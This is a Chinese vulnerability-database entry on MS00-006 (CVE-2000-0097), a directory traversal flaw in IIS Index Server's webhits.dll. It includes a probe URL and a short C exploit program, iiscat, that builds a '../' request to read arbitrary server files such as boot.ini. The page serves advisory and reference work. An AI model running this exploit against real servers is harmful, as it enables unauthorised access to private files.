Microsoft Windows Index Server远程目录遍历漏洞(MS00-006)

Microsoft Windows Index Server远程目录遍历漏洞(MS00-006)

漏洞ID 1105692 漏洞类型 输入验证
发布时间 2000-01-26 更新时间 2005-10-12
图片[1]-Microsoft Windows Index Server远程目录遍历漏洞(MS00-006)-安全小百科CVE编号 CVE-2000-0097
图片[2]-Microsoft Windows Index Server远程目录遍历漏洞(MS00-006)-安全小百科CNNVD-ID CNNVD-200001-056
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19731
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200001-056
|漏洞详情
MicrosoftIndexServer是WindowsNT4.0可选安装包中包括的一个基于Web的搜索引擎,在Windows2000系统中作为一个服务安装。InternetInformationServer4.0中一个ISAPI应用程序webhits.dll存在安全漏洞,允许攻击者突破WEB的虚拟文件系统,获得对在同一个逻辑驱动器中其它文件(如用户数据库、日志文件等任何能猜测路径名和文件名的文件)的非法访问。Webhits.dll动态链接库与.htw文件关联。但即使在系统中没有任何.htw文件,仍然可能有问题。检查系统是否存在这个安全问题的是输入:http://your_web_server_address/nosuchfile.htw,如果返回信息类似”formatoftheQUERY_STRINGisinvalid”,那么就说明存在安全问题。
|漏洞EXP
source: http://www.securityfocus.com/bid/950/info

Index Server 2.0 is a utility included in the NT 4.0 Option Pack. The functionality provided by Index Service has been built into Windows 2000 as Indexing Services.

When combined with IIS, Index Server and Indexing Services include the ability to view web search results in their original context. It will generate an html page showing the query terms in a short excerpt of the surrounding text for each page returned, along with a link to that page. This is known as "Hit Highlighting". To do this, it supports the .htw filetype which is handled by the webhits.dll ISAPI application. This dll will allow the use of the '../' directory traversal string in the selection of a template file. This will allow for remote, unauthenticated viewing of any file on the system whose location is known by the attacker.

The original patch released for this issue still discloses 'include' file types. 'include' files contain various data which assist in the execution of program files.

/* 
   [email protected] 
   
   example: iiscat ../../../../boot.ini
 */

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char request[2048], *request_p, *file_read, *file_valid = "/default.htm";
  int file_buf_size = 250;
  
  if (!((argc == 2 && argv[1] && strlen(argv[1]) < 1024) || 
	(argc == 3 && argv[1] && argv[2] && strlen(argv[1]) <= file_buf_size && strlen(argv[2]) < 1024)))
    {
      fprintf(stderr, "usage: iiscat file_to_read [valid_file]n");
      exit(1);
    }
  
  file_read = argv[1];
  if (argc == 3)
    file_valid = argv[2];

  sprintf(request, "GET %s", file_valid);
  request_p = request + strlen(request);

  file_buf_size -= strlen(file_valid);
  while(file_buf_size)
    {
      strcpy(request_p, "%20");
      request_p += 3;
      file_buf_size--;
    }

  sprintf(request_p, ".htw?CiWebHitsFile=%s&CiRestriction=none&CiHiliteType=Full HTTP/1.0nn", file_read);
  puts(request);

  exit(0);
}
|参考资料

来源:MS
名称:MS00-006
链接:http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
来源:BID
名称:950
链接:http://www.securityfocus.com/bid/950
来源:OSVDB
名称:1210
链接:http://www.osvdb.org/1210
来源:NSFOCUS
名称:270
链接:http://www.nsfocus.net/vulndb/270

相关推荐: PrivaShare 畸形消息 拒绝服务漏洞

PrivaShare 畸形消息 拒绝服务漏洞 漏洞ID 1108921 漏洞类型 未知 发布时间 2005-07-07 更新时间 2005-07-11 CVE编号 CVE-2005-2208 CNNVD-ID CNNVD-200507-094 漏洞平台 Win…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享